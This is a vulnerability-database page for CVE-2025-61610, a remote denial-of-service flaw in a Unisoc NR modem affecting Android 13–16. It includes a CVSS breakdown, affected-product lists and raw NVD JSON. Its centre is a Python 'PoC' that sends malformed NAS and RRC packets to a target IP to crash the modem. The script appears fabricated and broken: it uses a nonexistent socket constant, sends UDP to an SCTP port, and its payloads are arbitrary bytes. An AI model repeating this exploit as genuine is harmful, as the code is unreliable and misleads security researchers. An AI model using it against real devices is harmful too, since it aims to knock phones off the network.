Security Vulnerability Report
中文
CVE-2025-61610 CVSS 7.5 HIGH

CVE-2025-61610

Published: 2025-12-01 08:15:49
Last Modified: 2025-12-02 15:53:50
Source: [email protected]

Description

In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:unisoc:t8100:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:unisoc:t8200:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:unisoc:t8300:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:unisoc:t9100:-:*:*:*:*:*:*:* - NOT VULNERABLE
紫光展锐NR调制解调器 调制解调器固件 < 修复版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61610 PoC - NR Modem Denial of Service # Target: UNISOC NR Modem # Attack Type: Remote DoS via malformed NR protocol messages import socket import struct import random def create_malformed_nas_message(): """Create a malformed NAS message to trigger input validation bug""" # NAS Message Header nas_header = bytes([ 0x00, 0x00, # Extended protocol discriminator 0x00, # Security header type 0x00, # Message type ]) # Malformed IEI with invalid length malformed_ie = bytes([ 0xFF, # Invalid IEI 0xFF, 0xFF, # Invalid length (exceeds maximum) ]) # Padding with invalid data padding = bytes([random.randint(0, 255) for _ in range(100)]) return nas_header + malformed_ie + padding def create_malformed_rrc_message(): """Create a malformed RRC message""" rrc_header = bytes([ 0x00, # RRC message type 0xFF, # Invalid frequency 0xFF, 0xFF, # Invalid PCI ]) # Add oversized field oversized_field = bytes([0x00] * 1000) return rrc_header + oversized_field def send_dos_packet(target_ip, target_port=38412): """Send DoS packet to NR modem""" sock = socket.socket(socket.AF_INET, socket.SDSOCK_DGRAM) # Try NAS message nas_payload = create_malformed_nas_message() sock.sendto(nas_payload, (target_ip, target_port)) # Try RRC message rrc_payload = create_malformed_rrc_message() sock.sendto(rrc_payload, (target_ip, target_port)) sock.close() print(f"[+] Malformed packets sent to {target_ip}:{target_port}") if __name__ == "__main__": import sys if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip>") sys.exit(1) target = sys.argv[1] print(f"[*] CVE-2025-61610 PoC - Targeting {target}") send_dos_packet(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61610", "sourceIdentifier": "[email protected]", "published": "2025-12-01T08:15:48.597", "lastModified": "2025-12-02T15:53:49.503", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed"}, {"lang": "es", "value": "En el módem nr, existe una posible caída del sistema debido a una validación de entrada inadecuada. Esto podría conducir a una denegación de servicio remota sin necesidad de privilegios de ejecución adicionales."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "matchCriteriaId": "879FFD0C-9B38-4CAA-B057-1086D794D469"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "2700BCC5-634D-4EC6-AB67-5B678D5F951D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "2D49E611-5D53-479D-A981-42388FDC0E8D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8100:-:*:*:*:*:*:*:*", "matchCriteriaId": "F2DA04F2-5351-4043-A330-5397E627A222"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8200:-:*:*:*:*:*:*:*", "matchCriteriaId": "FC033D2C-ED1A-4EAB-A77B-8E1C88C74B0A"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8300:-:*:*:*:*:*:*:*", "matchCriteriaId": "DC7743D5-B187-48D4-BC77-D8DCDF263166"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t9100:-:*:*:*:*:*:*:*", "matchCriteriaId": "9D1F3B9D-142F-4E70-8477-E26D921EF19A"}]}]}], "references": [{"url": "https://www.unisoc.com/en/support/announcement/1995394837938163714", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.